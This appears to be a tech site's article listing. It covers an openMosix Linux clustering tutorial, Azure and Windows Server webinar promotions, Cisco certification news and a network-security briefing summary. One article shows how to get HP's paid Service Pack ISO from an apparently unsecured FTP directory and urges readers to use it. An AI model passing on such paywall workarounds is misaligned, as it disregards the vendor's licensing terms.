  • dsh - Distributed Shell. This allows you to run a command on all the nodes simultaneously. For example 'dsh -a reboot' will reboot all the nodes.

From the GUI, you can just start 'openmosixview'. This allows you to view and manage all the nodes in your cluster. It also shows you the load-balancing efficiency of the cluster in near real-time. You can also see the total speed and RAM that your cluster is providing you:

linux-openmosix-controlling-cluster-1

We should note that all cluster nodes that are online are shown in green, while all offline nodes are shown in red.

One of the neatest things about 'openmosixview' is the GUI for controlling process migration.

linux-openmosix-controlling-cluster-2

It depicts your current node at the center, and other nodes in the cluster around it. The ring around your node represents the processes running on your local box. If you hover over any of them you can see the process name and PID. Whenever one of your processes migrates to another node, you will see it detach and appear on a new node with a line linking it to your system!

You can also manually control the migration. You can drag and drop your processes onto other nodes, even selecting multiple processes and then dragging them to another node is easy. If you double click on a process running on a remote node, it will come back home and execute locally.

You can also open the openMosix process monitor which shows you which process is running on which node.

There is also a history analyzer to show you the load over a period of time. This allows you to see how your cluster was being used at any given point in time:

linux-openmosix-controlling-cluster-3

As you can see, the GUI tools are very powerful; they provide you with a large amount of the functionality that the command line tools do. If, however, you want to make your own scripts, the command line tools are much more versatile. Managing a cluster can be a lot of fun – modify the options and play around with the GUI to tweak and optimize your raw processing power! Our next article covers The openMosix File System.


OpenMosix - Part 5: Testing Your Cluster

Now let's actually make this cluster do some work! There is a quick tool you can use to monitor the load of your cluster.

Type 'mosmon' and press enter. You should see a screen similar to the screenshot below:

linux-openmosix-testing-cluster-1

 

Run mosmon in one VTY (press ctrl+alt+f1), then switch to another VTY (ctrl+alt+f2)

Let's run a simple awk command to run a nested loop and use up some processing power. If everything went well, we should see the load in mosmon jump up on one node, and then migrate to the other nodes.

The command you need to run is:

awk 'BEGIN {for(i=0;i<10000;i++)for(j=0;j<10000;j++);}'

If you choose to, you can start multiple awk processes by backgrounding them. Just append an ‘&' to the command line and run it a few times.
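For example, the following one-liner launches four of these awk processes in the background in one go (adjust the count to roughly match, or exceed, the number of nodes in your cluster):

for n in 1 2 3 4; do awk 'BEGIN {for(i=0;i<10000;i++)for(j=0;j<10000;j++);}' & done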

Go back to mosmon by pressing Ctrl+Alt+F1 and you should see the load rising on your current node, then slowly distributing to the other machines in the cluster, as in the picture below:

linux-openmosix-testing-cluster-2

Congratulations! You are now taking advantage of multi system clustering!

If you want, you can time the process running locally. First turn off openMosix by entering the command:

/etc/init.d/openmosix stop

Then run the following script:

#!/bin/sh
date
awk 'BEGIN {for(i=0;i<10000;i++)for(j=0;j<10000;j++);}'
date

This will tell you how long it took to perform the task. You can modify the loop values to make it last longer. Now restart openmosix, using the command:

/etc/init.d/openmosix start

Re-run the script to see how long it takes to process. Remember that your network is a bottleneck for performance. If your process finishes really quickly, it won't have time to migrate to the other nodes over the network. This is where tweaking and optimizing your cluster becomes fun.

Next up, we'll take a look at how you can control an openMosix cluster.


OpenMosix - Part 4: Starting Up Your OpenMosix Cluster

Okay, so now you've got a couple of machines with openMosix installed and booted, it's time to understand how to add systems to your cluster and make them work together.

OpenMosix has two ways of doing this:

1. Auto-discovery of Cluster Nodes

OpenMosix includes a daemon called 'omdiscd' which identifies other openMosix nodes on the network using multicast packets (for more on multicasting, please see our multicast page). This means you don't have to bother manually configuring the nodes. It's a simple way to get your cluster going: you just need to boot a machine and ensure it's on the network. Once booted, it should discover the existing cluster and add itself automatically!

Make sure you set up your network properly. As an example, if you are assigning an IP address of 192.168.1.10 to your first ethernet interface and your default gateway is 192.168.1.1 you would do something like this:

ifconfig eth0 192.168.1.10 netmask 255.255.255.0 broadcast 192.168.1.255 up (configures your system's ethernet interface)

route add default gw 192.168.1.1 (adds the default gateway)

The auto-discovery daemon might have started automatically on bootup, check using:

ps aux | grep 'omdiscd'

The above command should reveal the 'omdiscd' process running on your system.

If it hasn't, you can start it manually by typing 'omdiscd'. If you want to see the nodes getting added, you can choose to run omdiscd in the foreground by typing 'omdiscd -n'. This will help you troubleshoot the auto-discovery.

2. The /etc/openmosix.map File Configuration

If you don't want to use autodiscovery, you can manually manage your nodes using the openmosix.map file in the /etc directory. This file basically contains a list of the nodes on your cluster, and has to be the same across all the nodes in your cluster.

The syntax is very simple, it is a tab delimited list of the nodes in your cluster. There are 3 fields:

Node ID, IP Address and Number.

•  Node ID is the unique number for the node.

•  IP address is the IP address of the node.

•  Number specifies how many nodes are in the range starting at (and including) that IP.

As an example, if you have nodes

192.168.1.10

192.168.1.11

192.168.1.12

192.168.1.50

your file would look like this:

1 192.168.1.10 3

4 192.168.1.50 1

We could have manually specified the IPs 192.168.1.11 and 192.168.1.12, but by using the 'number' field, openMosix counts up the last octet of the IP and saves you the trouble of making individual entries.

Once you've done your configuration, you can control openMosix using the init.d script that should have been installed. If it was not, you can find it in the scripts directory of the userland tools you downloaded; move it to the init.d directory and make it executable like this:

mv ./openmosix /etc/init.d

chmod 755 /etc/init.d/openmosix

You can now start, stop and restart openMosix with the following commands:

/etc/init.d/openmosix start

/etc/init.d/openmosix stop

/etc/init.d/openmosix restart

Next up we'll take a look on how you can test your new openMosix cluster!


OpenMosix - Part 3: Using ClusterKnoppix

So maybe none of those methods worked for you. Well, you'll be happy to know that you can get a cluster up and running within a few minutes using an incredible bootable Knoppix liveCD that is preconfigured for clustering. It's called ‘ClusterKnoppix' and a quick search on Google will reveal a number of sources from where you can download the ISO images.

The best thing about ClusterKnoppix is that you can just boot a system with the CD and it will automatically add itself to the cluster. You don't even need to install the O/S to your hard disk. This makes it a very useful way to set up a cluster in a hurry using pre-existing systems.

Another really nice feature is that you don't need to burn 20 copies of the CD to make a 20 system cluster. Just boot one system with the CD, and then run the command

knoppix-terminalopenmosixserver

This will let you set up a clustering-enabled terminal server. Now, if you have any systems that can boot from their network card (PXE-compliant booting), they will automatically download a kernel image and run ClusterKnoppix!

It's awesome to see this at work, especially since we were working with 2 systems that didn't have a CD-ROM drive or a hard-disk. They just became diskless clients and contributed their resources to the cause! Next page covers starting up your openMosix Cluster.


OpenMosix - Part 2: Building An openMosix Cluster

Okay, let's get down to the fun part! Although it may sound hard, setting up a cluster is not very difficult. We're going to show you the hard way (which will teach you more) as well as a very neat, quick way to set up an instant cluster using a Knoppix Live CD. We suggest you try both to understand the benefits of each approach.

We will require the following:

1. Two or more machines (we need to cluster something!); the configuration doesn't matter, even if they are lower end. They will require network cards and need to be connected to each other over a network. Obviously, the more systems you have, the more powerful your cluster will be. Don't worry if you don't have many machines – we'll show you how to temporarily use resources from systems and schedule when they can contribute their processing power (this works very well in an office, where you might want some systems to join the cluster only after office hours).

2. A ClusterKnoppix LiveCD for the second part of this tutorial. While this is not strictly necessary, we want to show you some of the advantages of using the LiveCD for clustering. It also makes setting up the cluster extremely easy – you can get a fully working cluster up in the amount of time it takes to boot a system! You can get ClusterKnoppix from the following link: https://distrowatch.com/table.php?distribution=clusterknoppix

Getting & Installing openMosix

OpenMosix consists of two parts: the first is the kernel patch which does the actual clustering, and the second is the set of userland tools that allow you to monitor and control your cluster.

There are a variety of ways to install openMosix, we've chosen to show three of them:

1. Patching the kernel and installing from the source

2. Installing from RPM's

3. Installing in Debian

1. Installing from source

The latest version of openMosix at the time of this writing works with the kernel version 2.4.24. If you want to do this the proper way, get the plain kernel sources for 2.4.24 from https://www.kernel.org/ and the openMosix patch for the same version of the kernel from https://sourceforge.net/projects/openmosix/

At the time of writing this, the direct kernel source link is

http://www.kernel.org/pub/linux/kernel/v2.4/linux-2.4.24.tar.bz2

Once you've got the kernel sources, unpack them to your kernel source directory, in this case that should be:

/usr/src/linux-2.4.24

Now move the openMosix patch to the kernel source directory and apply it, like so:

mv /root/openMosix-2.4.24.gz /usr/src/linux-2.4.24

cd /usr/src/linux-2.4.24

zcat openMosix-2.4.24.gz | patch -Np1

NOTE: If you downloaded a bzip zipped file, you might need to use 'bzcat' rather than 'zcat' in the last line.

Now your kernel sources are patched with openMosix.

Now you have to configure your kernel sources, using one of the following commands:

make config

make menuconfig (uses an ncurses interface)

make xconfig (uses a TCL/TK GUI interface)

If you use X and have a recent distribution, 'make xconfig' is your best bet. Once you get the kernel configuration screens, enable the following openMosix options in the kernel configuration:

CONFIG_MOSIX=y

# CONFIG_MOSIX_TOPOLOGY is not set

CONFIG_MOSIX_UDB=y

# CONFIG_MOSIX_DEBUG is not set

# CONFIG_MOSIX_CHEAT_MIGSELF is not set

CONFIG_MOSIX_WEEEEEEEEE=y

CONFIG_MOSIX_DIAG=y

CONFIG_MOSIX_SECUREPORTS=y

CONFIG_MOSIX_DISCLOSURE=3

CONFIG_QKERNEL_EXT=y

CONFIG_MOSIX_DFSA=y

CONFIG_MOSIX_FS=y

CONFIG_MOSIX_PIPE_EXCEPTIONS=y

CONFIG_QOS_JID=y

Feel free to tweak your other kernel settings based on your hardware and requirements just as you would when installing a new kernel.

Finally, finish it all off by compiling the kernel with:

make dep bzImage modules modules_install

Now install your new kernel in your bootloader. For example, if you use LILO, edit your /etc/lilo.conf and create a new entry for your openMosix-enhanced kernel. Simply copying the entry for your regular kernel and changing the kernel image to point to your new kernel should be enough. Don't forget to run 'lilo' when you finish editing the file.
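As a rough sketch, the duplicated LILO entry might look something like the following (the image path, label and root device are illustrative assumptions – keep whatever values your existing entry already uses):

image=/boot/vmlinuz-2.4.24-openmosix
    label=openmosix
    root=/dev/hda1
    read-only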

After you have completed this, reboot, and if all went well, you should be able to select the openMosix kernel you just installed and boot with it. If something didn't work right, you can still select your regular kernel and boot normally to troubleshoot.

2. Installing from RPM

If you have an RPM based distribution, you can directly get a pre-compiled kernel image with openMosix enabled from the openMosix site (https://sourceforge.net/projects/openmosix/).

This is a fairly easy way to install openMosix as you just need to install two RPMs. This should work with Red Hat, SUSE etc. Get the latest RPMs for the following two packages:

a) openmosix-kernel

b) openmosix-tools

Now you can simply install both of these by using the command:

rpm -Uvh openmosix*.rpm
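
If you want to confirm that both packages actually landed, a quick check (assuming the default package names) is:

rpm -qa | grep openmosix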

If you are using GRUB, the RPMs will even make the entry in your GRUB config, so you can just reboot and select the new kernel. If you use LILO you will have to manually make the entry in /etc/lilo.conf. Simply copying the entry for your regular kernel and changing the kernel image to point to your new kernel should be enough. Don't forget to run 'lilo' when you finish editing the file.

That should be all you need to do for the RPM based installation. Just reboot and choose the openMosix kernel when you are given the choice.

3. Installing in Debian

You can install the RPMs in Debian as well by using Alien, but it is better to use apt-get to install the kernel sources and the openMosix kernel patch. You can also use the 'apt-get' command to install openmosixview, which will give you a GUI to manage the cluster.

This is the basic procedure to follow for installing openMosix under Debian.

First, get the packages:

cd /usr/src

apt-get install kernel-source-2.4.24 kernel-package \
    openmosix kernel-patch-openmosix

Untar them and create the links:

tar vxjf kernel-source-2.4.24.tar.bz2

ln -s /usr/src/kernel-source-2.4.24 /usr/src/linux

Apply the patch:

cd /usr/src/linux

../kernel-patches/i386/apply/openmosix

Install the kernel:

make menuconfig

make-kpkg kernel_image modules_image

cd ..

dpkg -i kernel-image-*-openmosix-*.deb

After this you can use 'apt-get' to install the openmosixview GUI utility for managing your cluster using the following command:

apt-get install openmosixview
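
Whichever installation route you took, the command-line userland tools give you a quick way to watch and steer the cluster once the openMosix kernel is running. A minimal sketch of the most common ones (the process ID and node number are placeholders, and exact option names can vary slightly between tool versions):

mosmon                 # ncurses monitor showing the load on every node
mosctl status          # report this node's openMosix status
migrate 1234 2         # manually push process 1234 to node 2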

Assuming you've successfully installed openMosix or booted the Cluster Knoppix LiveCD, you're ready to start using it - which also happens to be the topic of the next section: Using ClusterKnoppix

  • Hits: 25392

OpenMosix - Part 1: Understanding openMosix

As we said before, openMosix is a single system image clustering extension for the Linux kernel. It has its roots in the extremely popular MOSIX clustering project, the main difference being that it is distributed under the GNU General Public License.

It allows a cluster of computers to behave like one big multi-processor computer. For example, if you run 2 processes on a single machine, each process will only get 50% of the CPU time. However, if you run both these processes over a 2 node cluster, each process will get 100% CPU time since there are two processors available. In essence, this behavior is very similar to SMP (Symmetric Multi-Processor) systems.

Diving Deeper

What openMosix does is balance the processing load over the systems in the cluster, taking into account the speed of the systems and the load they already have. Note however, that it does not parallelize the processing. Each individual process only runs on one computer at a time.

To quote the openMosix website example:

'If your computer could convert a WAV to a MP3 in a minute, then buying another nine computers and joining them in a ten-node openMosix cluster would NOT let you convert a WAV in six seconds. However, what it would allow you to do is convert 10 WAVs simultaneously. Each one would take a minute, but since you can do lots in parallel you'd get through your CD collection much faster.'
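
You can see this behaviour for yourself on a running cluster by firing off a handful of independent CPU-bound jobs and watching them spread across nodes with a monitor such as mosmon. A minimal sketch (the awk loop is just a convenient way to burn CPU; any CPU-bound process will do):

for i in 1 2 3 4; do
    awk 'BEGIN { for (j = 0; j < 10000000; j++) x = sqrt(j) }' &   # one independent CPU-bound job
done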

This simultaneous processing has a lot of uses, as there are many tasks that adapt extremely well to being run on a cluster. In later sections, we'll show you some practical and fun uses for an openMosix-based GNU/Linux cluster. Next: Building An openMosix Cluster

 

  • Hits: 15811

FREE WEBINAR: Microsoft Azure Certifications Explained - A Deep Dive for IT Professionals in 2020

It’s common knowledge, or at least should be, that certifications are the most effective way for IT professionals to climb the career ladder, and they are only getting more important in an increasingly competitive professional marketplace. Similarly, cloud-based technologies are experiencing unparalleled growth, and the demand for IT professionals with qualifications in this sector is growing rapidly. Make 2020 your breakthrough year - check out this free upcoming webinar hosted by two Microsoft cloud experts to plan your Azure certification strategy in 2020.

microsoft azure certifications explained

The webinar features a full analysis of the Microsoft Azure certification landscape in 2020, giving you the knowledge to properly prepare for a future working with cloud-based workloads. Seasoned veterans Microsoft MVP Andy Syrewicze and Microsoft cloud expert Michael Bender will be hosting the event which includes Azure certification tracks, training and examination costs, learning materials, resources and labs for self-study, how to gain access to FREE Azure resources, and more. 

Altaro’s webinars are always well attended and one reason for this is the encouragement for attendee participation. Every single question asked is answered and no stone is left unturned by the presenters. They also present the event live twice to allow as many people as possible to have the chance of attending the event and asking their questions in person! 

For IT professionals in 2020, and especially those with a Microsoft ecosystem focus, this event is a must-attend! 

The webinar will be held on Wednesday February 19, at 3pm CET/6am PST/9am EST and again at 7pm CET/10am PST/1pm EST. I’ll be attending so I’ll see you there!

While the event date has passed, it has been recorded and is available for viewing. All materials are available as direct downloads. Click here to access the event.

  • Hits: 3332

Free Webinar: Azure Security Center: How to Protect Your Datacenter with Next Generation Security

Security is a major concern for IT admins and if you’re responsible for important workloads hosted in Azure, you need to know your security is as tight as possible. In this free webinar, presented by Thomas Maurer, Senior Cloud Advocate on the Microsoft Azure Engineering Team, and Microsoft MVP Andy Syrewicze, you will learn how to use Azure Security Center to ensure your cloud environment is fully protected.

There are certain topics in the IT administration world which are optional but security is not one of them. Ensuring your security knowledge is ahead of the curve is an absolute necessity and becoming increasingly important as we are all becoming exposed to more and more online threats every day. If you are responsible for important workloads hosted in Azure, this webinar is a must!

The webinar covers:

  • Azure Security Center introductions
  • Deployment and first steps
  • Best practices
  • Integration with other tools
  • And much more!

Being an Altaro-hosted webinar, expect this webinar to be packed full of actionable information presented via live demos so you can see the theory put into practice before your eyes. Also, Altaro put a heavy emphasis on interactivity, encouraging questions from attendees and using engaging polls to get instant feedback on the session. To ensure as many people as possible have this opportunity, Altaro present the webinar live twice so pick the best time for you and don’t be afraid to ask as many questions as you like!

Webinar: Azure Security Center: How to Protect Your Datacenter with Next Generation Security
Date: Tuesday, 30th July
Time: Webinar presented live twice on the day. Choose your preferred time:

  • 2pm CEST / 5am PDT / 8am EDT
  • 7pm CEST / 10am PDT / 1pm EDT

While the event date has passed, it has been recorded and is available for viewing. All materials are available as direct downloads. Click here to access the event.

azure security center webinar

  • Hits: 7743

Major Cisco Certification Changes - New Cisco CCNA, CCNP Enterprise, Specialist, DevNet and more from Feb. 2020

Cisco announced a major update to their CCNA, CCNP and CCIE certification program at Cisco Live last week, with the changes happening on the 24th of February 2020.

CCNA & CCENT Certification

The 10 current CCNA tracks (CCNA Routing and Switching, CCNA Cloud, CCNA Collaboration, CCNA Cyber Ops, CCNA Data Center, CCNA Industrial, CCNA Security, CCNA Service Provider, CCNA Wireless and CCNA Design) are being retired and replaced with a single ‘CCNA’ certification. The new CCNA exam combines most of the information on the current CCNA Routing and Switching with additional wireless, security and network automation content.

A new Cisco Certified DevNet Associate certification is also being released to satisfy the increasing demand in this area.

The current CCENT certification is being retired. There hasn’t been an official announcement from Cisco yet but rumours are saying that we might be seeing new ‘Foundations’ certifications which will focus on content from the retiring CCNA tracks.

CCNP Certification

Different technology tracks remain at the CCNP level. CCNP Routing and Switching, CCNP Design and CCNP Wireless are being consolidated into the new CCNP Enterprise, and CCNP Cloud is being retired. A new Cisco Certified DevNet Professional certification is also being released.

Only two exams will be required to achieve each CCNP certification – a Core and a Concentration exam. Being CCNA certified will no longer be a prerequisite for the CCNP certification.

If you pass any CCNP level exams before February 24 2020, you’ll receive badging for corresponding new exams and credit toward the new CCNP certification.

new cisco certification roadmap 2020


CCIE Certification

The format of the CCIE remains largely the same, with a written and lab exam required to achieve the certification. The CCNP Core exam will be used as the CCIE written exam, however, so there will no longer be a separate written exam at the CCIE level. Automation and Network Programmability are being added to the exams for every track.

All certifications will be valid for 3 years under the new program so you will no longer need to recertify CCIE every 2 years.

How the Changes Affect You

If you’re currently studying for any Cisco certification the advice from Cisco is to keep going. If you pass before the cutover your certification will remain valid for 3 years from the date you certify. If you pass some but not all CCNP level exams before the change you can receive credit towards the new certifications.

We've added a few resources you can turn to for additional information:

The Flackbox blog has a comprehensive video and text post covering all the changes.

The official Cisco certification page is here.

  • Hits: 26677

Free Azure IaaS Webinar with Microsoft Azure Engineering Team

Implementing Infrastructure as a Service (IaaS) is a great way of streamlining and optimizing your IT environment by utilizing virtualized resources from the cloud to complement your existing on-site infrastructure. It enables a flexible combination of the traditional on-premises data center alongside the benefits of cloud-based subscription services. If you’re not making use of this model, there’s no better opportunity to learn what it can do for you than in the upcoming webinar from Altaro: How to Supercharge your Infrastructure with Azure IaaS.

The webinar will be presented by Thomas Maurer, who has recently been appointed Senior Cloud Advocate on the Microsoft Azure Engineering Team, alongside Altaro Technical Evangelist and Microsoft MVP Andy Syrewicze.

The webinar will be primarily focused on showing how Azure IaaS solves real use cases by going through the scenarios live on air. Three use cases have been outlined already, however, the webinar format encourages those attending to suggest their own use cases when signing up and the two most popular suggestions will be added to the list for Thomas and Andy to tackle. To submit your own use case request, simply fill out the suggestion box in the sign up form when you register!

Once again, this webinar is going to be presented live twice on the day (Wednesday 13th February). So if you can’t make the earlier session (2pm CET / 8am EST / 5am PST), just sign up for the later one instead (7pm CET / 1pm EST / 10am PST) - or vice versa. Both sessions cover the same content but having two live sessions gives more people the opportunity to ask their questions live on air and get instant feedback from these Microsoft experts.

Save your seat for the webinar!

Free IaaS Webinar with Microsoft Azure Engineering Team

While the event date has passed, it has been recorded and is available for viewing. All materials are available as direct downloads. Click here to access the event.

  • Hits: 5097

Altaro VM Backup v8 (VMware & Hyper-V) with WAN-Optimized Replication dramatically reduces Recovery Time Objective (RTO)

Altaro, a global leader in virtual machine data protection and recovery, has introduced WAN-Optimized Replication in its latest version, v8, allowing businesses to be back up and running in minimal time should disaster strike. Replication permits a business to make an ongoing copy of its virtual machines (VMs) and to access that copy with immediacy should anything go wrong with the live VMs. This dramatically reduces the recovery time objective (RTO).

VMware and Hyper-V Backup

Optimized for WANs, Altaro's WAN-Optimized Replication enables system administrators to replicate ongoing changes to their virtual machines (VMs) to a remote site and to seamlessly continue working from the replicated VMs should something go wrong with the live VMs, such as damage due to severe weather conditions, flooding, ransomware, viruses, server crashes and so on.

Drastically Reducing RTO

"WAN-Optimized Replication allows businesses to continue accessing and working in the case of damage to their on-premise servers. If their office building is hit by a hurricane and experiences flooding, for instance, they can continue working from their VMs that have been replicated to an offsite location," explained David Vella, CEO and co-founder of Altaro Software.

"As these are continually updated with changes, businesses using Altaro VM Backup can continue working without a glitch, with minimal to no data loss, and with an excellent recovery time objective, or RTO."

Click here to download your free copy of Altaro VMware Backup now

Centralised, Multi-tenant View For MSPs

Managed Service Providers (MSPs) can now add replication services to their offering, with the ability to replicate customer data to the MSP's infrastructure. This way, if a customer site goes down, that customer can immediately access its VMs through the MSP's infrastructure and continue working.

With Altaro VM Backup for MSPs, MSPs can manage their customer accounts through a multi-tenant online console for greater ease, speed and efficiency, enabling them to provide their customers with a better, faster service.

How To Upgrade

WAN-Optimized Replication is currently available exclusively for customers who have the Unlimited Plus edition of Altaro VM Backup. It is automatically included in Altaro VM Backup for MSPs.

Upgrading to Altaro VM Backup v8 is free for Unlimited Plus customers who have a valid Software Maintenance Agreement (SMA). The latest build can be downloaded from this page. If customers are not under active SMA, they should contact their Altaro Partner for information about how to upgrade.

New users can benefit from a fully-functional 30-day trial of Altaro VM Backup Unlimited Plus.

  • Hits: 5803

Free Live Demo Webinar: Windows Server 2019 in Action

So you’ve heard all about Windows Server 2019 - now you can see it in action in a live demo webinar on November 8th! The last WS2019 webinar by Altaro was hugely popular with over 4,500 IT pros registering for the event. Feedback was gathered from that webinar, and the most popular features will now be tested live by Microsoft MVP Andy Syrewicze. And you’re invited!

This deep-dive webinar will focus on:

  • Windows Admin Center
  • Containers on Windows Server
  • Storage Migration Service
  • Windows Subsystem for Linux
  • And more!

Demo webinars are a really great way to see a product in action before you decide to take the plunge yourself. It enables you to see the strengths and weaknesses first-hand and also ask questions that might relate specifically to your own environment. With the demand so high, the webinar is presented live twice on November 8th to help as many people benefit as possible.

altaro windows server 2019 in action webinar

The first session is at 2pm CET/8am EST/5am PST and the second is at 7pm CET/1pm EST/10am PST. With the record number of attendees for the last webinar, some people were unable to attend the sessions which were maxed out. It is advised you save your seat early for this webinar to keep informed and ensure you don’t miss the live event.

Save your seat: https://goo.gl/2RKrSe

While the event date has passed, it has been recorded and is available for viewing. All materials are available as direct downloads. Click here to access the event.

  • Hits: 5967

Windows Server 2019 Free Webinar

With Microsoft Ignite just around the corner, Windows Server 2019 is set to get its full release and the signs look good. Very good. Unless you’re part of the Windows Server insider program - which grants you access to the latest Windows Server Preview builds - you probably haven’t had a hands-on experience yet with Windows Server 2019 but the guys over at Altaro have and are preparing to host a webinar on the 3rd of October to tell you all about it.

altaro windows server 2019 webinar

The webinar will be held a week after Microsoft Ignite so it will cover the complete feature set included in the full release as well as a more in-depth look at the most important features in Windows Server 2019. Whenever a new version of Windows Server gets released there’s always a lot of attention and media coverage so it’s nice to have an hour long session where you can sit back and let a panel of Microsoft experts cut through the noise and give you all the information you need.

It’s also a great chance to ask your questions directly to those with the inside knowledge and receive answers live on air. Over 2000 people have now registered for this webinar and we’re going to be joining too. It’s free to register - what are you waiting for?

Save your seat: https://goo.gl/V9tYYb

Note: While this event has passed, it’s still available to view and you can download all related/presented material. Click on the above link to access the event recording.

  • Hits: 4865

Download HP Service Pack (SPP) for ProLiant Servers for Free (Firmware & Drivers .ISO)– Directly from HP!

Downloading all necessary drivers and firmware upgrades for your HP ProLiant server is very important, especially if hardware compatibility is critical for new operating system installations or virtualized environments (VMware, Hyper-V). Until recently, HP customers could download the HP Service Pack (SPP) for ProLiant servers free of charge, but that’s no longer the case as HP is forcing customers to pay up in order to get access to its popular SPP package.

For those who are unaware, the HP SPP is a single ISO image that contains all the latest firmware, software and drivers for HP’s ProLiant servers, supporting older and newer operating systems including virtualization platforms such as VMware and Hyper-V.

From HP’s perspective, you can either search for and download free of charge each individual driver you think is needed for your server, or you buy a support contract and get everything in one neat ISO with all the necessary additional tools to make life easy – sounds attractive, right? Well, it depends which way you look at it… not everyone is happy to pay for firmware and driver updates considering they are usually provided free of charge.

A quick search for HP Proliant firmware or drivers on any search engine will bring up HP’s Enterprise Support Center where the impression is given that we are one step away from downloading our much wanted SPP:

HP Proliant SPP Driver and Firmware Free Download

Figure 1. Attempting to download the HP Service Pack for ProLiant (SPP) ISO

When clicking on the ‘Obtain Software’ link, users receive the bad news:

hp-service-pack-for-proliant-spp-free-download-2

Figure 2. Sorry, you need to pay up to download the HP Service Pack ISO image!

Well, this is not the case – at least for now.

Apparently HP has set up this new policy to ensure customers pay for their server driver upgrades, however, they’ve forgotten (thankfully) one very important detail – securing the location of the HP Service Pack for ProLiant (SPP) ISO :)

To directly access the latest version of HP’s SPP ISO image simply click on the following URL or copy-paste it to your web browser:

ftp://ftp.hp.com/pub/softlib2/software1/cd-generic/p67859018/v113584/

HP’s FTP server is apparently wide open, allowing anonymous users to access and download not only the latest SPP ISO image, but pretty much browse the whole SPP repository and download any SPP version they want:

The latest (free) HP SPP ISO is just a click away!

Figure 3. The latest (free) HP SPP ISO is just a click away!

Simply click the “Up to higher level directory” link to move up and get access to all other versions of the SPP repository!

It’s great to see HP really cares about its customers and allows them to freely download the HP Service Pack (SPP) for ProLiant servers. It’s not every day you get a vendor being so generous to its customers, so if you’ve got an HP ProLiant server, make sure you update its drivers and firmware while you still can!

Note: The above URL may no longer be active - in that case you can download it from here:

https://www.systrade.de/download/SPP/

  • Hits: 296567

Colasoft Announces Release of Capsa Network Analyzer v8.2

February 23, 2016 – Colasoft LLC, a leading provider of innovative and affordable network analysis solutions, today announced the availability of Colasoft Capsa Network Analyzer v8.2, a real-time portable network analyzer for wired and wireless network monitoring, bandwidth analysis, and intrusion detection. The data flow display and protocol recognition are optimized in Capsa Network Analyzer 8.2.

Capsa v8.2 is capable of analyzing the traffic of a wireless AP across two channels. Users can choose up to two wireless channels to analyze the total traffic, which greatly enhances the accuracy of wireless traffic analysis. Hex display of decoded data is added in the Data Flow sub-view in the TCP/UDP Conversation view, and users can switch the display format between hex and text in Capsa v8.2.

Besides the optimizations of the Data Flow sub-view in the TCP/UDP Conversation view, and with the continuous improvement of CSTRE (Colasoft Traffic Recognition Engine), Capsa 8.2 is capable of recognizing up to 1546 protocols and sub-protocols, which covers most of the mainstream protocols.

“We have also enhanced the interface of Capsa, which improves user experience”, said Brian K. Smith, Vice President at Colasoft LLC. “The release of Capsa v8.2 provides a more comprehensive network analysis result to our customers.”

  • Hits: 8663

Safety in Numbers - Cisco & Microsoft

By Campbell Taylor

Recently I attended a presentation by Lynx Technology in London. The presentation was about the complementary use of Cisco and Microsoft technology for network security. The title of the presentation was “End-to-end Security Briefing” and it set out to show the need for security within the network as well as at the perimeter. This document is an overview of that presentation but focuses on some key areas rather than covering the entire presentation verbatim. The slides for the original presentation can be found at http://www.lynxtec.com/presentations/.

The presentation opened with a discussion about firewalls and recommended a dual firewall arrangement as being the most effective in many situations. Their dual firewall recommendation was a hardware firewall at the closest point to the Internet. For this they recommended Cisco's PIX firewall. The recommendation for the second firewall was an application firewall, such as Microsoft's Internet Security and Acceleration server (ISA) 2004 or Checkpoint's NG products.

The key point made here is that the hardware firewall will typically filter traffic from OSI levels 1 – 4 thus easing the workload on the 2nd firewall which will filter OSI levels 1 – 7.

To elaborate, the first firewall can check that packets are of the right type but cannot look at the payload that may be malicious, malformed HTTP requests, viruses, restricted content etc.

This level of inspection is possible with ISA.

Figure 1. Dual firewall configuration
Provides improved performance and filtering for traffic from OSI levels 1 – 7.

 You may also wish to consider terminating any VPN traffic at the firewall so that the traffic can be inspected prior to being passed through to the LAN. End to end encryption is creating security issues, as some firewalls are not able to inspect the encrypted traffic. This provides a tunnel for malicious users through the network firewall.

Content attacks were seen as an area of vulnerability, which highlights the need to scan the payload of packets. The presentation particularly made mention of attacks via SMTP and Outlook Web Access (OWA).

Network vendors are moving towards providing a security checklist that is applied when a machine connects to the network. Cisco's version is called Network Access Control (NAC) and Microsoft's is called Network Access Quarantine Control (NAQC) although another technology called Network Access Protection (NAP) is to be implemented in the future.

Previously NAP was to be a part of Server 2003 R2 (R2 due for release end of 2005). Microsoft and Cisco have agreed to develop their network access technologies in a complementary fashion so that they will integrate. Therefore clients connecting to the Cisco network will be checked for appropriate access policies based on Microsoft's Active Directory and Group Policy configuration.

The following is taken directly from the Microsoft website: http://www.microsoft.com/windowsserver2003/techinfo/overview/quarantine.mspx

Note: Network Access Quarantine Control is not the same as Network Access Protection, which is a new policy enforcement platform that is being considered for inclusion in Windows Server "Longhorn," the next version of the Windows Server operating system.

Network Access Quarantine Control only provides added protection for remote access connections. Network Access Protection provides added protection for virtual private network (VPN) connections, Dynamic Host Configuration Protocol (DHCP) configuration, and Internet Protocol security (IPsec)-based communication.

 ISA Server & Cisco Technologies

ISA 2004 sits in front of the server OS that hosts the application firewall and filters traffic as it enters the server from the NIC, thereby intercepting it before it is passed up the OSI layers.

This means that ISA can still offer a secure external-facing application firewall even when the underlying OS may be unpatched and vulnerable. Lynx advised that ISA 2000, with a throughput of 282 Mbps, beat its next closest rival, Checkpoint. ISA 2004 offers an even higher throughput of 1.59 Gbps (Network Computing Magazine, March 2003).


Cisco's NAC can be used to manage user nodes (desktops and laptops) connecting to your LAN. A part of Cisco's NAC is the Cisco Trust Agent which is a component that runs on the user node and talks to the AV server and RADIUS server. NAC targets the “branch office connecting to head office” scenario and supports AV vendor products from McAfee, Symantec and Trend. Phase 2 of Cisco's NAC will provide compliance checking and enforcement with Microsoft patching.

ISA can be utilized in these scenarios with any new connections being moved to a stub network. Checks are then run to make sure the user node meets the corporate requirements for AV, patching, authorisation etc. Compliance is enforced by NAC and NAQC/NAP. Once a connecting user node passes this security audit and any remedial actions are completed the user node is moved from the stub network into the LAN proper.

Moving inside the private network, the “Defence in depth” mantra was reiterated. A key point was to break up a flat network. For example clients should have little need to talk directly to each other, instead it should be more of a star topology with the servers in the centre and clients talking to the servers. This is where Virtual Local Area Networks (VLANs) would be suitable and this type of configuration makes it more difficult for network worms to spread.

Patch Management, Wireless & Security Tools

Patch Management

Patch management will ensure that known Microsoft vulnerabilities can be addressed (generally) by applying the relevant hotfix or service pack. Although not much detail was given, the Hotfix Network Checker (HfNetChk) was highlighted as an appropriate tool, along with the Microsoft Baseline Security Analyser (MBSA).

Restrict Software

